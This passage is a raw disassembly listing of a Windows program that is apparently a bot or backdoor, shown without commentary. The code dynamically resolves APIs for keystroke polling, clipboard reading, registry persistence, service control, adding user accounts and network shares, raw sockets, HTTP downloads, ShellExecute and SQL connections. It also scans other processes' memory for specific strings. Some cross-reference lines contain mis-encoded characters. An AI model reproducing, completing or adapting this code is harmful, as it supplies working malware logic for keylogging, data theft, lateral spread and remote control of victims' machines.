lea eax, [ebp+Buffer]
push 1Ch ; dwLength
push eax ; lpBuffer
push ebx ; lpAddress
push [ebp+hProcess] ; hProcess
call VirtualQueryEx ; VirtualQueryEx
test eax, eax
jz short loc_409F64
mov edx, [ebp+Buffer.State]
mov ecx, [ebp+Buffer.RegionSize]
mov eax, 1000h
mov [ebp+var_4], ecx
and edx, eax
cmp edx, eax
jnz short loc_409F6A
test byte ptr [ebp+Buffer.Protect+1], 1
jnz short loc_409F6A
push ecx ; dwBytes
push 8 ; dwFlags
call edi ; GetProcessHeap
push eax ; hHeap
call HeapAlloc
mov esi, eax
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
and [ebp+NumberOfBytesRead], 0
push [ebp+Buffer.RegionSize] ; nSize
push esi ; lpBuffer
push ebx ; lpBaseAddress
push [ebp+hProcess] ; hProcess
call ReadProcessMemory ; ReadProcessMemory
test eax, eax
jz short loc_409F56
push 444AC8h
push esi
call sub_423116
pop ecx
test eax, eax
pop ecx
jnz short loc_409F56
lea eax, [esi+400h]
push 4452C8h
push eax
call sub_423116
pop ecx
test eax, eax
pop ecx
jz short loc_409F88
loc_409F56: ; CODE XREF: sub_409E8F+9D�j
; sub_409E8F+AE�j
push esi ; lpMem
push 0 ; dwFlags
call edi ; GetProcessHeap
push eax ; hHeap
call HeapFree
jmp short loc_409F6A
; ---------------------------------------------------------------------------
loc_409F64: ; CODE XREF: sub_409E8F+5B�j
mov eax, [ebp+SystemInfo.dwPageSize]
mov [ebp+var_4], eax
loc_409F6A: ; CODE XREF: sub_409E8F+6F�j
; sub_409E8F+75�j ...
add ebx, [ebp+var_4]
cmp ebx, [ebp+var_C]
jb loc_409ED8
loc_409F76: ; CODE XREF: sub_409E8F+3D�j
xor esi, esi
loc_409F78: ; CODE XREF: sub_409E8F+12B�j
push [ebp+hProcess]
call dword ptr byte_424074+4
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_409F88: ; CODE XREF: sub_409E8F+C5�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov dword ptr unk_445CE0, ebx
mov dword ptr unk_445CE4, eax
cmp [eax], cl
jnz short loc_409FAA
cmp [eax+1], cl
jz short loc_409FB2
loc_409FAA: ; CODE XREF: sub_409E8F+114�j
; sub_409E8F+121�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_409FAA
loc_409FB2: ; CODE XREF: sub_409E8F+119�j
mov eax, [ebp+arg_4]
xor esi, esi
inc esi
mov [eax], ecx
jmp short loc_409F78
sub_409E8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409FBC proc near ; CODE XREF: sub_409990+135�p
var_8 = word ptr -8
var_6 = word ptr -6
lpMem = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword ptr unk_445CDC
push esi
mov esi, GetProcessHeap
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_6], ax
mov [ebp+var_8], cx
movzx eax, ax
push eax ; dwBytes
push 8 ; dwFlags
call esi ; GetProcessHeap
push eax ; hHeap
call HeapAlloc
mov ecx, dword ptr unk_445CDC
mov [ebp+lpMem], eax
add ecx, ecx
push ecx
push dword ptr unk_445CE4
push eax
call sub_417A40
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
mov al, byte ptr unk_445CE8
push eax
call dword ptr unk_445ACC
push [ebp+lpMem]
mov edi, 445AD8h
push 444AC8h
push 4452C8h
push [ebp+arg_0]
push 42D6A8h
push 200h
push edi
call sub_417EDA
add esp, 1Ch
push [ebp+lpMem] ; lpMem
push 0 ; dwFlags
call esi ; GetProcessHeap
push eax ; hHeap
call HeapFree
mov eax, edi
pop edi
pop esi
leave
retn
sub_409FBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A053 proc near ; CODE XREF: sub_409990:loc_409ACC�p
var_18 = word ptr -18h
var_16 = word ptr -16h
lpMem = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword ptr unk_445CDC
push ebx
push esi
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_16], ax
mov [ebp+var_18], cx
movzx eax, ax
push eax ; dwBytes
push 8 ; dwFlags
call GetProcessHeap ; GetProcessHeap
push eax ; hHeap
call HeapAlloc
and [ebp+var_C], 0
mov [ebp+lpMem], eax
mov ebx, 4452C8h
mov edi, 200h
mov esi, 4448C8h
loc_40A099: ; CODE XREF: sub_40A053+FA�j
mov eax, dword ptr unk_445CDC
add eax, eax
push eax
push dword ptr unk_445CE4
push [ebp+lpMem]
call sub_417A40
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
push [ebp+var_C]
call dword ptr unk_445ACC
mov eax, dword ptr unk_445CDC
and [ebp+var_10], 0
mov ecx, [ebp+lpMem]
mov [ebp+var_8], 1
test eax, eax
jbe short loc_40A10E
loc_40A0D6: ; CODE XREF: sub_40A053+B3�j
cmp [ebp+var_8], 0
jz short loc_40A12B
mov dl, [ecx]
test dl, dl
mov [ebp+var_1], dl
jz short loc_40A0FA
cmp byte ptr [ecx+1], 0
jnz short loc_40A0FA
cmp dl, 20h
jnb short loc_40A0F4
and [ebp+var_8], 0
loc_40A0F4: ; CODE XREF: sub_40A053+9B�j
cmp [ebp+var_1], 7Eh
jbe short loc_40A0FE
loc_40A0FA: ; CODE XREF: sub_40A053+90�j
; sub_40A053+96�j
and [ebp+var_8], 0
loc_40A0FE: ; CODE XREF: sub_40A053+A5�j
inc ecx
inc ecx
inc [ebp+var_10]
cmp [ebp+var_10], eax
jb short loc_40A0D6
cmp [ebp+var_8], 0
jz short loc_40A12B
loc_40A10E: ; CODE XREF: sub_40A053+81�j
push [ebp+lpMem]
push 444AC8h
push ebx
push [ebp+arg_0]
push 42D6A8h
push edi
push esi
call sub_417EDA
add esp, 1Ch
jmp short loc_40A143
; ---------------------------------------------------------------------------
loc_40A12B: ; CODE XREF: sub_40A053+87�j
; sub_40A053+B9�j
push 444AC8h
push ebx
push [ebp+arg_0]
push 42D718h
push edi
push esi
call sub_417EDA
add esp, 18h
loc_40A143: ; CODE XREF: sub_40A053+D6�j
inc [ebp+var_C]
cmp [ebp+var_C], 0FFh
jbe loc_40A099
push [ebp+lpMem] ; lpMem
push 0 ; dwFlags
call GetProcessHeap ; GetProcessHeap
push eax ; hHeap
call HeapFree
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_40A053 endp
; =============== S U B R O U T I N E =======================================
sub_40A16C proc near ; CODE XREF: sub_40F1EA+58�p
push ebx
push ebp
mov ebp, dword ptr byte_4240F8
push esi
push edi
push 42E040h
call ebp ; byte_4240F8
mov esi, dword ptr byte_4240D4
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_40A28C
push 42E030h
push edi
call esi ; byte_4240D4
push 42E014h
push edi
mov SetErrorMode, eax
call esi ; byte_4240D4
push 42E004h
push edi
mov CreateToolhelp32Snapshot, eax
call esi ; byte_4240D4
push 42DFF4h
push edi
mov Process32First, eax
call esi ; byte_4240D4
push 42DFE4h
push edi
mov Process32Next, eax
call esi ; byte_4240D4
push 42DFD0h
push edi
mov Module32First, eax
call esi ; byte_4240D4
push 42DFB8h
push edi
mov GetDiskFreeSpaceExA, eax
call esi ; byte_4240D4
push 42DFA8h
push edi
mov GetLogicalDriveStringsA, eax
call esi ; byte_4240D4
push 42DF9Ch
push edi
mov GetDriveTypeA, eax
call esi ; byte_4240D4
push 42DF84h
push edi
mov dword ptr byte_445EDC, eax
call esi ; byte_4240D4
push 42DF68h
push edi
mov dword ptr byte_445D50, eax
call esi ; byte_4240D4
cmp SetErrorMode, ebx
mov dword ptr byte_445D38, eax
jz short loc_40A26A
cmp CreateToolhelp32Snapshot, ebx
jz short loc_40A26A
cmp Process32First, ebx
jz short loc_40A26A
cmp Process32Next, ebx
jz short loc_40A26A
cmp GetDiskFreeSpaceExA, ebx
jz short loc_40A26A
cmp GetLogicalDriveStringsA, ebx
jz short loc_40A26A
cmp GetDriveTypeA, ebx
jz short loc_40A26A
cmp dword ptr byte_445EDC, ebx
jz short loc_40A26A
cmp dword ptr byte_445D50, ebx
jz short loc_40A26A
cmp eax, ebx
jnz short loc_40A274
loc_40A26A: ; CODE XREF: sub_40A16C+B8�j
; sub_40A16C+C0�j ...
mov dword ptr byte_445EDC+4, 1
loc_40A274: ; CODE XREF: sub_40A16C+FC�j
push 42DF50h
push edi
call esi ; byte_4240D4
cmp eax, ebx
mov dword ptr byte_445E5C, eax
jz short loc_40A2A1
push 1
push ebx
call eax
jmp short loc_40A2A1
; ---------------------------------------------------------------------------
loc_40A28C: ; CODE XREF: sub_40A16C+1D�j
call GetLastError
mov dword ptr byte_445EDC+8, eax
mov dword ptr byte_445EDC+4, 1
loc_40A2A1: ; CODE XREF: sub_40A16C+117�j
; sub_40A16C+11E�j
push 42DF44h
call dword ptr byte_4240D4+4
mov edi, eax
cmp edi, ebx
jz loc_40A3B6
push 42DF34h
push edi
call esi ; byte_4240D4
push 42DF28h
push edi
mov SendMessageA, eax
call esi ; byte_4240D4
push 42DF1Ch
push edi
mov FindWindowA, eax
call esi ; byte_4240D4
push 42DF0Ch
push edi
mov IsWindow, eax
call esi ; byte_4240D4
push 42DEFCh
push edi
mov DestroyWindow, eax
call esi ; byte_4240D4
push 42DEE8h
push edi
mov OpenClipboard, eax
call esi ; byte_4240D4
push 42DED8h
push edi
mov GetClipboardData, eax
call esi ; byte_4240D4
push 42DEC8h
push edi
mov CloseClipboard, eax
call esi ; byte_4240D4
cmp SendMessageA, ebx
mov ExitWindowsEx, eax
jz short loc_40A35A
cmp FindWindowA, ebx
jz short loc_40A35A
cmp IsWindow, ebx
jz short loc_40A35A
cmp DestroyWindow, ebx
jz short loc_40A35A
cmp OpenClipboard, ebx
jz short loc_40A35A
cmp GetClipboardData, ebx
jz short loc_40A35A
cmp CloseClipboard, ebx
jz short loc_40A35A
cmp eax, ebx
jnz short loc_40A364
loc_40A35A: ; CODE XREF: sub_40A16C+1B8�j
; sub_40A16C+1C0�j ...
mov dword ptr byte_445EDC+0Ch, 1
loc_40A364: ; CODE XREF: sub_40A16C+1EC�j
push 42DEB4h
push edi
call esi ; byte_4240D4
push 42DEA8h
push edi
mov GetAsyncKeyState, eax
call esi ; byte_4240D4
push 42DE98h
push edi
mov GetKeyState, eax
call esi ; byte_4240D4
push 42DE84h
push edi
mov GetWindowTextA, eax
call esi ; byte_4240D4
cmp GetAsyncKeyState, ebx
mov GetForegroundWindow, eax
jz short loc_40A3C1
cmp GetKeyState, ebx
jz short loc_40A3C1
cmp GetWindowTextA, ebx
jz short loc_40A3C1
cmp eax, ebx
jnz short loc_40A3CB
jmp short loc_40A3C1
; ---------------------------------------------------------------------------
loc_40A3B6: ; CODE XREF: sub_40A16C+144�j
call GetLastError
mov dword ptr byte_445EDC+10h, eax
loc_40A3C1: ; CODE XREF: sub_40A16C+232�j
; sub_40A16C+23A�j ...
mov dword ptr byte_445EDC+0Ch, 1
loc_40A3CB: ; CODE XREF: sub_40A16C+246�j
push 42DE74h
call ebp ; byte_4240F8
mov edi, eax
cmp edi, ebx
jz loc_40A566
push 42DE64h
push edi
call esi ; byte_4240D4
push 42DE54h
push edi
mov RegOpenKeyExA, eax
call esi ; byte_4240D4
push 42DE44h
push edi
mov RegCreateKeyExA, eax
call esi ; byte_4240D4
push 42DE30h
push edi
mov RegSetValueExA, eax
call esi ; byte_4240D4
push 42DE20h
push edi
mov RegQueryValueExA, eax
call esi ; byte_4240D4
push 42DE14h
push edi
mov RegDeleteValueA, eax
call esi ; byte_4240D4
cmp RegOpenKeyExA, ebx
mov RegCloseKey, eax
jz short loc_40A456
cmp RegCreateKeyExA, ebx
jz short loc_40A456
cmp RegSetValueExA, ebx
jz short loc_40A456
cmp RegQueryValueExA, ebx
jz short loc_40A456
cmp RegDeleteValueA, ebx
jz short loc_40A456
cmp eax, ebx
jnz short loc_40A460
loc_40A456: ; CODE XREF: sub_40A16C+2C4�j
; sub_40A16C+2CC�j ...
mov dword ptr byte_445EDC+14h, 1
loc_40A460: ; CODE XREF: sub_40A16C+2E8�j
push 42DE00h
push edi
call esi ; byte_4240D4
push 42DDE8h
push edi
mov OpenProcessToken, eax
call esi ; byte_4240D4
push 42DDD0h
push edi
mov LookupPrivilegeValueA, eax
call esi ; byte_4240D4
cmp OpenProcessToken, ebx
mov AdjustTokenPrivileges, eax
jz short loc_40A49B
cmp LookupPrivilegeValueA, ebx
jz short loc_40A49B
cmp eax, ebx
jnz short loc_40A4A5
loc_40A49B: ; CODE XREF: sub_40A16C+321�j
; sub_40A16C+329�j
mov dword ptr byte_445EDC+14h, 1
loc_40A4A5: ; CODE XREF: sub_40A16C+32D�j
push 42DDC0h
push edi
call esi ; byte_4240D4
push 42DDB0h
push edi
mov OpenSCManagerA, eax
call esi ; byte_4240D4
push 42DDA0h
push edi
mov OpenServiceA, eax
call esi ; byte_4240D4
push 42DD90h
push edi
mov StartServiceA, eax
call esi ; byte_4240D4
push 42DD80h
push edi
mov ControlService, eax
call esi ; byte_4240D4
push 42DD6Ch
push edi
mov DeleteService, eax
call esi ; byte_4240D4
push 42DD58h
push edi
mov CloseServiceHandle, eax
call esi ; byte_4240D4
push 42DD3Ch
push edi
mov EnumServicesStatusA, eax
call esi ; byte_4240D4
cmp OpenSCManagerA, ebx
mov IsValidSecurityDescriptor, eax
jz short loc_40A549
cmp OpenServiceA, ebx
jz short loc_40A549
cmp StartServiceA, ebx
jz short loc_40A549
cmp ControlService, ebx
jz short loc_40A549
cmp DeleteService, ebx
jz short loc_40A549
cmp CloseServiceHandle, ebx
jz short loc_40A549
cmp EnumServicesStatusA, ebx
jz short loc_40A549
cmp eax, ebx
jnz short loc_40A553
loc_40A549: ; CODE XREF: sub_40A16C+3A7�j
; sub_40A16C+3AF�j ...
mov dword ptr byte_445EDC+14h, 1
loc_40A553: ; CODE XREF: sub_40A16C+3DB�j
push 42DD2Ch
push edi
call esi ; byte_4240D4
cmp eax, ebx
mov GetUserNameA, eax
jnz short loc_40A57B
jmp short loc_40A571
; ---------------------------------------------------------------------------
loc_40A566: ; CODE XREF: sub_40A16C+26A�j
call GetLastError
mov dword ptr byte_445EDC+18h, eax
loc_40A571: ; CODE XREF: sub_40A16C+3F8�j
mov dword ptr byte_445EDC+14h, 1
loc_40A57B: ; CODE XREF: sub_40A16C+3F6�j
push 42DD20h
call ebp ; byte_4240F8
mov edi, eax
cmp edi, ebx
jz loc_40A647
push 42DD14h
push edi
call esi ; byte_4240D4
push 42DD00h
push edi
mov CreateDCA, eax
call esi ; byte_4240D4
push 42DCECh
push edi
mov CreateDIBSection, eax
call esi ; byte_4240D4
push 42DCDCh
push edi
mov CreateCompatibleDC, eax
call esi ; byte_4240D4
push 42DCC8h
push edi
mov GetDeviceCaps, eax
call esi ; byte_4240D4
push 42DCB8h
push edi
mov GetDIBColorTable, eax
call esi ; byte_4240D4
push 42DCB0h
push edi
mov SelectObject, eax
call esi ; byte_4240D4
push 42DCA4h
push edi
mov BitBlt, eax
call esi ; byte_4240D4
push 42DC94h
push edi
mov DeleteDC, eax
call esi ; byte_4240D4
cmp CreateDCA, ebx
mov DeleteObject, eax
jz short loc_40A652
cmp CreateDIBSection, ebx
jz short loc_40A652
cmp CreateCompatibleDC, ebx
jz short loc_40A652
cmp GetDeviceCaps, ebx
jz short loc_40A652
cmp GetDIBColorTable, ebx
jz short loc_40A652
cmp SelectObject, ebx
jz short loc_40A652
cmp BitBlt, ebx
jz short loc_40A652
cmp DeleteDC, ebx
jz short loc_40A652
cmp eax, ebx
jnz short loc_40A65C
jmp short loc_40A652
; ---------------------------------------------------------------------------
loc_40A647: ; CODE XREF: sub_40A16C+41A�j
call GetLastError
mov dword ptr byte_445EDC+20h, eax
loc_40A652: ; CODE XREF: sub_40A16C+49B�j
; sub_40A16C+4A3�j ...
mov dword ptr byte_445EDC+1Ch, 1
loc_40A65C: ; CODE XREF: sub_40A16C+4D7�j
mov ebp, dword ptr byte_4240D4+4
push 42DC88h
call ebp
mov edi, eax
cmp edi, ebx
jz loc_40A918
push 42DC7Ch
push edi
call esi ; byte_4240D4
push 42DC70h
push edi
mov WSAStartup_0, eax
call esi ; byte_4240D4
push 42DC60h
push edi
mov WSASocketA, eax
call esi ; byte_4240D4
push 42DC50h
push edi
mov WSAAsyncSelect, eax
call esi ; byte_4240D4
push 42DC44h
push edi
mov __WSAFDIsSet_0, eax
call esi ; byte_4240D4
push 42DC34h
push edi
mov WSAIoctl, eax
call esi ; byte_4240D4
push 42DC28h
push edi
mov WSAGetLastError, eax
call esi ; byte_4240D4
push 42DC20h
push edi
mov WSACleanup_0, eax
call esi ; byte_4240D4
push 42DC14h
push edi
mov socket_0, eax
call esi ; byte_4240D4
push 42DC0Ch
push edi
mov ioctlsocket_0, eax
call esi ; byte_4240D4
push 42DC00h
push edi
mov connect_0, eax
call esi ; byte_4240D4
push 42DBF4h
push edi
mov inet_ntoa_0, eax
call esi ; byte_4240D4
push 42DBECh
push edi
mov inet_addr_0, eax
call esi ; byte_4240D4
push 42DBE4h
push edi
mov htons_2, eax
call esi ; byte_4240D4
push 42DBDCh
push edi
mov htonl_0, eax
call esi ; byte_4240D4
push 42DBD4h
push edi
mov htons_1, eax
call esi ; byte_4240D4
push 42DBCCh
push edi
mov htonl, eax
call esi ; byte_4240D4
push 42DBC4h
push edi
mov send_0, eax
call esi ; byte_4240D4
push 42DBBCh
push edi
mov sendto, eax
call esi ; byte_4240D4
push 42DBB0h
push edi
mov recv_0, eax
call esi ; byte_4240D4
mov recvfrom, eax
push 42DBA8h
push edi
call esi ; byte_4240D4
push 42DBA0h
push edi
mov bind_0, eax
call esi ; byte_4240D4
push 42DB98h
push edi
mov select_0, eax
call esi ; byte_4240D4
push 42DB90h
push edi
mov listen_0, eax
call esi ; byte_4240D4
push 42DB84h
push edi
mov accept_0, eax
call esi ; byte_4240D4
push 42DB78h
push edi
mov setsockopt_0, eax
call esi ; byte_4240D4
push 42DB6Ch
push edi
mov getsockname, eax
call esi ; byte_4240D4
push 42DB5Ch
push edi
mov gethostname, eax
call esi ; byte_4240D4
push 42DB4Ch
push edi
mov gethostbyname, eax
call esi ; byte_4240D4
push 42DB40h
push edi
mov gethostbyaddr, eax
call esi ; byte_4240D4
push 42DB34h
push edi
mov dword ptr byte_445D80, eax
call esi ; byte_4240D4
cmp WSAStartup_0, ebx
mov closesocket_0, eax
jz loc_40A923
cmp WSASocketA, ebx
jz loc_40A923
cmp WSAAsyncSelect, ebx
jz loc_40A923
cmp WSAIoctl, ebx
jz loc_40A923
cmp WSAGetLastError, ebx
jz loc_40A923
cmp WSACleanup_0, ebx
jz loc_40A923
cmp socket_0, ebx
jz loc_40A923
cmp ioctlsocket_0, ebx
jz loc_40A923
cmp connect_0, ebx
jz loc_40A923
cmp inet_ntoa_0, ebx
jz loc_40A923
cmp inet_addr_0, ebx
jz loc_40A923
cmp htons_2, ebx
jz loc_40A923
cmp htonl_0, ebx
jz loc_40A923
cmp htons_1, ebx
jz short loc_40A923
cmp send_0, ebx
jz short loc_40A923
cmp sendto, ebx
jz short loc_40A923
cmp recv_0, ebx
jz short loc_40A923
cmp recvfrom, ebx
jz short loc_40A923
cmp bind_0, ebx
jz short loc_40A923
cmp select_0, ebx
jz short loc_40A923
cmp listen_0, ebx
jz short loc_40A923
cmp accept_0, ebx
jz short loc_40A923
cmp setsockopt_0, ebx
jz short loc_40A923
cmp getsockname, ebx
jz short loc_40A923
cmp gethostname, ebx
jz short loc_40A923
cmp gethostbyname, ebx
jz short loc_40A923
cmp gethostbyaddr, ebx
jz short loc_40A923
cmp eax, ebx
jnz short loc_40A92D
jmp short loc_40A923
; ---------------------------------------------------------------------------
loc_40A918: ; CODE XREF: sub_40A16C+501�j
call GetLastError
mov dword ptr byte_445EDC+28h, eax
loc_40A923: ; CODE XREF: sub_40A16C+6A0�j
; sub_40A16C+6AC�j ...
mov dword ptr byte_445EDC+24h, 1
loc_40A92D: ; CODE XREF: sub_40A16C+7A8�j
push 42DB28h
call ebp
mov edi, eax
cmp edi, ebx
jz loc_40AA32
push 42DB0Ch
push edi
call esi ; byte_4240D4
push 42DAF0h
push edi
mov InternetGetConnectedState, eax
call esi ; byte_4240D4
push 42DADCh
push edi
mov InternetGetConnectedStateEx, eax
call esi ; byte_4240D4
push 42DAC8h
push edi
mov HttpOpenRequestA, eax
call esi ; byte_4240D4
push 42DAB4h
push edi
mov HttpSendRequestA, eax
call esi ; byte_4240D4
push 42DAA4h
push edi
mov InternetConnectA, eax
call esi ; byte_4240D4
push 42DA90h
push edi
mov InternetOpenA, eax
call esi ; byte_4240D4
push 42DA7Ch
push edi
mov InternetOpenUrlA, eax
call esi ; byte_4240D4
push 42DA68h
push edi
mov InternetCrackUrlA, eax
call esi ; byte_4240D4
push 42DA54h
push edi
mov InternetReadFile, eax
call esi ; byte_4240D4
cmp InternetGetConnectedState, ebx
mov ecx, InternetOpenA
mov InternetCloseHandle, eax
jz short loc_40AA0E
cmp InternetGetConnectedStateEx, ebx
jz short loc_40AA0E
cmp HttpOpenRequestA, ebx
jz short loc_40AA0E
cmp HttpSendRequestA, ebx
jz short loc_40AA0E
cmp InternetConnectA, ebx
jz short loc_40AA0E
cmp ecx, ebx
jz short loc_40AA0E
cmp InternetOpenUrlA, ebx
jz short loc_40AA0E
cmp InternetCrackUrlA, ebx
jz short loc_40AA0E
cmp InternetReadFile, ebx
jz short loc_40AA0E
cmp eax, ebx
jnz short loc_40AA18
loc_40AA0E: ; CODE XREF: sub_40A16C+860�j
; sub_40A16C+868�j ...
mov dword ptr byte_445EDC+2Ch, 1
loc_40AA18: ; CODE XREF: sub_40A16C+8A0�j
cmp ecx, ebx
jz short loc_40AA4D
push ebx
push ebx
push ebx
push ebx
push 42DA38h
call ecx ; InternetOpenA
cmp eax, ebx
mov dword ptr byte_445DD4, eax
jnz short loc_40AA4D
jmp short loc_40AA47
; ---------------------------------------------------------------------------
loc_40AA32: ; CODE XREF: sub_40A16C+7CC�j
call GetLastError
mov dword ptr byte_445EDC+30h, eax
mov dword ptr byte_445EDC+2Ch, 1
loc_40AA47: ; CODE XREF: sub_40A16C+8C4�j
mov dword ptr byte_445DD4, ebx
loc_40AA4D: ; CODE XREF: sub_40A16C+8AE�j
; sub_40A16C+8C2�j
push 42DA2Ch
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_40AA97
push 42DA1Ch
push edi
call esi ; byte_4240D4
push 42DA0Ch
push edi
mov IcmpCreateFile, eax
call esi ; byte_4240D4
push 42D9FCh
push edi
mov IcmpCloseHandle, eax
call esi ; byte_4240D4
cmp IcmpCreateFile, ebx
mov IcmpSendEcho, eax
jz short loc_40AAA2
cmp IcmpCloseHandle, ebx
jz short loc_40AAA2
cmp eax, ebx
jnz short loc_40AAAC
jmp short loc_40AAA2
; ---------------------------------------------------------------------------
loc_40AA97: ; CODE XREF: sub_40A16C+8EC�j
call GetLastError
mov dword ptr byte_445EDC+38h, eax
loc_40AAA2: ; CODE XREF: sub_40A16C+91B�j
; sub_40A16C+923�j ...
mov dword ptr byte_445EDC+34h, 1
loc_40AAAC: ; CODE XREF: sub_40A16C+927�j
push 42D9ECh
call ebp
mov edi, eax
cmp edi, ebx
jz loc_40ABA2
push 42D9E0h
push edi
call esi ; byte_4240D4
push 42D9D4h
push edi
mov NetShareAdd, eax
call esi ; byte_4240D4
push 42D9C4h
push edi
mov NetShareDel, eax
call esi ; byte_4240D4
push 42D9B0h
push edi
mov NetShareEnum, eax
call esi ; byte_4240D4
push 42D99Ch
push edi
mov dword ptr byte_445DA4, eax
call esi ; byte_4240D4
push 42D98Ch
push edi
mov NetApiBufferFree, eax
call esi ; byte_4240D4
push 42D980h
push edi
mov dword ptr byte_445D5C, eax
call esi ; byte_4240D4
push 42D974h
push edi
mov NetUserAdd, eax
call esi ; byte_4240D4
push 42D968h
push edi
mov NetUserDel, eax
call esi ; byte_4240D4
push 42D958h
push edi
mov NetUserEnum, eax
call esi ; byte_4240D4
push 42D940h
push edi
mov NetUserGetInfo, eax
call esi ; byte_4240D4
cmp NetShareAdd, ebx
mov NetMessageBufferSend, eax
jz short loc_40ABAD
cmp NetShareDel, ebx
jz short loc_40ABAD
cmp NetShareEnum, ebx
jz short loc_40ABAD
cmp dword ptr byte_445DA4, ebx
jz short loc_40ABAD
cmp NetApiBufferFree, ebx
jz short loc_40ABAD
cmp dword ptr byte_445D5C, ebx
jz short loc_40ABAD
cmp NetUserAdd, ebx
jz short loc_40ABAD
cmp NetUserDel, ebx
jz short loc_40ABAD
cmp NetUserEnum, ebx
jz short loc_40ABAD
cmp NetUserGetInfo, ebx
jz short loc_40ABAD
cmp eax, ebx
jnz short loc_40ABB7
jmp short loc_40ABAD
; ---------------------------------------------------------------------------
loc_40ABA2: ; CODE XREF: sub_40A16C+94B�j
call GetLastError
mov dword ptr byte_445EDC+40h, eax
loc_40ABAD: ; CODE XREF: sub_40A16C+9E6�j
; sub_40A16C+9EE�j ...
mov dword ptr byte_445EDC+3Ch, 1
loc_40ABB7: ; CODE XREF: sub_40A16C+A32�j
push 42D934h
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_40ABEC
push 42D91Ch
push edi
call esi ; byte_4240D4
push 42D8FCh
push edi
mov DnsFlushResolverCache, eax
call esi ; byte_4240D4
cmp DnsFlushResolverCache, ebx
mov dword ptr byte_445E1C, eax
jz short loc_40ABF7
cmp eax, ebx
jnz short loc_40AC01
jmp short loc_40ABF7
; ---------------------------------------------------------------------------
loc_40ABEC: ; CODE XREF: sub_40A16C+A56�j
call GetLastError
mov dword ptr byte_445EDC+48h, eax
loc_40ABF7: ; CODE XREF: sub_40A16C+A78�j
; sub_40A16C+A7E�j
mov dword ptr byte_445EDC+44h, 1
loc_40AC01: ; CODE XREF: sub_40A16C+A7C�j
push 42D8ECh
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_40AC36
push 42D8DCh
push edi
call esi ; byte_4240D4
push 42D8C8h
push edi
mov GetIpNetTable, eax
call esi ; byte_4240D4
cmp GetIpNetTable, ebx
mov DeleteIpNetEntry, eax
jz short loc_40AC41
cmp eax, ebx
jnz short loc_40AC4B
jmp short loc_40AC41
; ---------------------------------------------------------------------------
loc_40AC36: ; CODE XREF: sub_40A16C+AA0�j
call GetLastError
mov dword ptr byte_445EDC+50h, eax
loc_40AC41: ; CODE XREF: sub_40A16C+AC2�j
; sub_40A16C+AC8�j
mov dword ptr byte_445EDC+4Ch, 1
loc_40AC4B: ; CODE XREF: sub_40A16C+AC6�j
push 42D8C0h
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_40ACAA
push 42D8ACh
push edi
call esi ; byte_4240D4
push 42D898h
push edi
mov dword ptr byte_445ECC, eax
call esi ; byte_4240D4
push 42D880h
push edi
mov WNetAddConnection2W, eax
call esi ; byte_4240D4
push 42D868h
push edi
mov dword ptr byte_445E8C, eax
call esi ; byte_4240D4
cmp dword ptr byte_445ECC, ebx
mov WNetCancelConnection2W, eax
jz short loc_40ACB5
cmp WNetAddConnection2W, ebx
jz short loc_40ACB5
cmp dword ptr byte_445E8C, ebx
jz short loc_40ACB5
cmp eax, ebx
jnz short loc_40ACBF
jmp short loc_40ACB5
; ---------------------------------------------------------------------------
loc_40ACAA: ; CODE XREF: sub_40A16C+AEA�j
call GetLastError
mov dword ptr byte_445EDC+58h, eax
loc_40ACB5: ; CODE XREF: sub_40A16C+B26�j
; sub_40A16C+B2E�j ...
mov dword ptr byte_445EDC+54h, 1
loc_40ACBF: ; CODE XREF: sub_40A16C+B3A�j
push 42D85Ch
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_40ACF4
push 42D84Ch
push edi
call esi ; byte_4240D4
push 42D83Ch
push edi
mov ShellExecuteA, eax
call esi ; byte_4240D4
cmp ShellExecuteA, ebx
mov dword ptr byte_445E98, eax
jz short loc_40ACFF
cmp eax, ebx
jnz short loc_40AD09
jmp short loc_40ACFF
; ---------------------------------------------------------------------------
loc_40ACF4: ; CODE XREF: sub_40A16C+B5E�j
call GetLastError
mov dword ptr byte_445EDC+60h, eax
loc_40ACFF: ; CODE XREF: sub_40A16C+B80�j
; sub_40A16C+B86�j
mov dword ptr byte_445EDC+5Ch, 1
loc_40AD09: ; CODE XREF: sub_40A16C+B84�j
push 42D830h
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_40AD92
push 42D81Ch
push edi
call esi ; byte_4240D4
push 42D80Ch
push edi
mov SQLDriverConnect, eax
call esi ; byte_4240D4
push 42D7FCh
push edi
mov SQLSetEnvAttr, eax
call esi ; byte_4240D4
push 42D7ECh
push edi
mov SQLExecDirect, eax
call esi ; byte_4240D4
push 42D7DCh
push edi
mov SQLAllocHandle, eax
call esi ; byte_4240D4
push 42D7CCh
push edi
mov SQLFreeHandle, eax
call esi ; byte_4240D4
cmp SQLDriverConnect, ebx
mov dword ptr byte_445DB4, eax
jz short loc_40AD9D
cmp SQLSetEnvAttr, ebx
jz short loc_40AD9D
cmp SQLExecDirect, ebx
jz short loc_40AD9D
cmp SQLAllocHandle, ebx
jz short loc_40AD9D
cmp SQLFreeHandle, ebx
jz short loc_40AD9D
cmp eax, ebx
jnz short loc_40ADA7
jmp short loc_40AD9D
; ---------------------------------------------------------------------------
loc_40AD92: ; CODE XREF: sub_40A16C+BA8�j
call GetLastError
mov dword ptr byte_445EDC+68h, eax
